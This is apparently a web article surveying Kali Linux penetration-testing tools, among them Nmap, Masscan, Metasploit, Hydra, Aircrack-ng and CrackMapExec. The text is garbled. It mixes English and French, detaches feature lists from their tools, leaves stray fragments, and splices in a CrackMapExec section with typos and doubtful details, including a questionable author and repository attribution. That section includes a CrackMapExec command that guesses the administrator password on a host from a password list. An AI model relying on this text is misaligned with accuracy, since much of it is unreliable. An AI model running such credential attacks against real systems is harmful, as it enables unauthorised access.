This article presents a Linux distribution that serves as a true toolbox for testing teh security of a corporate network: Kali Linux. Renowned to the point of being integrated into several cybersecurity certifications, this distribution is dedicated to penetration testing, security audits, and post-cyberattack inquiry.
Based on the Debian distribution, Kali Linux contains more than 600 utilities to help administrators discover vulnerabilities, correct configuration errors, find exposed data, etc.
You can run Kali linux on a physical machine, as a virtual machine, from a bootable medium, from cloud images, or even as a container.
Learning to use Kali Linux effectively can be intimidating, especially if you are an administrator with additional responsibilities. Familiarizing yourself with the available tools helps you understand when and how to use Kali to get the best results.
Warning: tools such as those in Kali Linux must be used legally and helpfully by security professionals, but they can also be used illicitly and unethically. Ensure that any intended use is ethical, legal, and lawful. If you are unsure of the legality, do not proceed until you are certain. This may require research on your part, such as, an honest discussion with your internal legal counsel about what you have planned.
Ther are two other Linux distributions specializing in cybersecurity: ParrotOS and BlackArch Linux. These are less dedicated to network security than Kali Linux and are more suitable for testing the security of submission servers and other workstations.
The Kali menu classifies its utilities into several categories, including:
- Details gathering. This category includes
- Support for capturing banners on multiple protocols.
- Transmit 10 million packets per second from a single machine.
- Use asynchronous transmission, meaning Masscan can send and receive requests separately. It therefore does not need to wait for the response of each scan to move on to the next.
- TCP banner capture.
- UDTP (User Datagram Protocol) protocol analysis.
- Recording and filtering of packet capture files (PCAP).
- Identification of operating system, applications and components.
- Understanding exploits and payloads, as well as auxiliary tasks that do not use payloads.
- Normalizing the way network engineers work with exploit code by promoting payload reuse and using a common methodology to interact with exploits.
- Includes spidering tools, a randomization tool, a request repeater, and an interception proxy.
- Checks for SQL injections, cross-site scripting, OS command injections, illicit HTTP request traffic, failing authentications, etc.
- Supports both static and dynamic testing.
- Prend en charge plus de 20 protocoles différents.
- Permet d’utiliser des listes de mots de passe.
- Est rapide et efficace.
- Focuses on 802.11 wireless local networks.
- Provides command-line tools that allow for intensive scripting.
- Performs WEP dictionary attacks and fragmentation attacks.
- Detects unauthorized access points (APs).
- Supports radio frequency sensors, Zigbee, and multiple beacons.
- Is compatible with tcpdump and Wireshark.
- “`html
13/ Nmap
Nmap (Network Mapper) est un outil de scan de réseau open source.Il est utilisé pour découvrir des hôtes et des services sur un réseau en envoyant des paquets et en analysant les réponses.
Les principales fonctionnalités de cet outil sont :
- Découverte d’hôtes : identification des hôtes actifs sur un réseau.
- Scan de ports : détermination des ports ouverts sur un hôte.
- Détection de version : identification des versions des services en cours d’exécution sur un hôte.
- Détection de système d’exploitation : tentative de détermination du système d’exploitation en cours d’exécution sur un hôte.
- scripting : automatisation de tâches complexes à l’aide de scripts Nmap (NSE).
14/ wireshark,tcpdump,NS
Wireshark est un analyseur de paquets réseau open source. Il capture le trafic réseau en temps réel et permet aux praticiens d’inspecter le contenu des paquets.
Tcpdump est un outil en ligne de commande pour capturer et analyser le trafic réseau. Il est souvent utilisé sur les serveurs et les systèmes embarqués.
Les principales fonctionnalités de ces outils sont :
15/ Arpwatch
Arpwatch est un outil qui surveille le trafic Ethernet et ARP. Il gère une base de données des relations entre les adresses MAC et IP.Si un changement est détecté, tel qu’une nouvelle adresse ou une modification d’adresse, il alerte les administrateurs.
Les principales fonctionnalités de cet outil sont :
- Produit des journaux et peut envoyer des alertes par e-mail aux praticiens.
- Aide à détecter l’usurpation ARP.
16/ Sqlmap
Sqlmap est un outil automatisé permettant d’exposer et d’exploiter les vulnérabilités d’injection SQL. Il fonctionne avec Microsoft SQL Server, MySQL, PostgreSQL, Oracle et d’autres.
Les principales fonctionnalités de cet outil sont :
- Effectue des requêtes booléennes, temporelles, basées sur les erreurs, basées sur
CrackMapExec: A Powerful Post-Exploitation Tool
CrackMapExec (CME) is a Swiss Army knife for Active Directory post-exploitation, enabling penetration testers and security professionals to efficiently audit and compromise Windows networks. Developed by Carnal0, CME automates many tasks traditionally performed manually, significantly reducing the time required to assess network security.
Core Functionality and Features
CME functions as a modular framework, offering a wide range of features including:
- Credential Harvesting: CME can attempt to crack password hashes obtained from systems within the network using various methods, including password spraying and brute-force attacks.
- Remote Code Execution: It allows for the execution of arbitrary commands on remote Windows machines,facilitating further exploitation.
- Active Directory Enumeration: CME comprehensively maps the Active Directory environment, identifying users, groups, computers, and their relationships.
- Pass-the-Hash: CME supports pass-the-hash attacks,leveraging stolen password hashes to gain access to other systems.
- SMB exploitation: It exploits vulnerabilities in the Server Message Block (SMB) protocol to gain initial access or escalate privileges.
Example: Enumerating Domain Information
A common use case for CME is quickly gathering information about a target domain. For example, using the command
crackmapexec smb 192.168.1.10 -u administrator --passwords passwords.txt, a penetration tester can attempt to connect to the machine at 192.168.1.10 as the ‘administrator’ user, using a list of passwords contained in the ‘passwords.txt’ file. This command also performs initial enumeration of the system, revealing operating system version and other key details. This functionality streamlines the reconnaissance phase of a penetration test.CrackMapExec is included as a standard tool in Kali Linux, a popular distribution for penetration testing, and is available for download from the Kali Linux tools page.It is written in python and is actively maintained, with the latest version released on December 20, 2023, according to its GitHub repository (https://github.com/carnal0/crackmapexec).
2/ Masscan
Table of Contents
Masscan is an IP port scanner that offers many of the same features as Nmap. The main difference lies in the fact that Masscan is designed to quickly scan large networks, multiple machines, and the Internet, while Nmap is intended for more targeted scans on a single network or machine. However, Masscan’s speed can increase network traffic.
its main features are:
According to its author, Robert Graham, Masscan can scan the entire Internet in less than five minutes.
3/ Unicornscan
Unicornscan is a stateless port scanner that sends data to potentially vulnerable TCP/IP devices and analyzes the results. It is ofen faster than Nmap on larger networks, and capable of masking its scans.
The main features of this tool are:
6/ metasploit
metasploit is a complete framework for collecting information and executing exploits against targeted systems. It contains ready-to-use exploit code and lures for known vulnerabilities.
The main features of this tool are:
For those starting with Metasploit, it is indeed possible to use Metasploitable, a deliberately weakened virtual machine intended to test exploits and familiarize yourself with Metasploit.
7/ Burp Suite
Burp Suite is a web application vulnerability scanner developed by PortSwigger,a security testing software publisher.It identifies issues, performs in-depth analysis of websites, and can send modified HTTP requests to detect vulnerabilities.
Its main features are:
9/ Hydra
Hydra est un outil d’audit de mots de passe. Il permet de mener des attaques par force brute contre différents protocoles de connexion.
Les principales fonctionnalités de cet outil sont :
10/ Aircrack-ng
Aircrack-ng is a suite of wireless security tools that includes several applications for monitoring, intercepting, and injecting. It includes airdecap-ng, a decryptor for WEP (Wired Equivalent Privacy) and WAP (Wi-Fi Protected Access) capture files; Airodump-ng, a tool that collects packets and WPA handshakes; Airtun-ng, a virtual tunnel interface creator; and Besside-ng, a WEP and WPA cracker.
The main features of this tool are:
11/ Kismet
Kismet is a wireless and Bluetooth network detector, sniffer, and intrusion detection system (IDS) on a wireless network.
Its main features are:
12/ Wifite
Wifite is a wireless network penetration testing and auditing tool writen in Python. It collects service identifiers, signal strength, and other information. It also attacks WEP, WPA, and WPA2 keys.
The main features of this tool are:
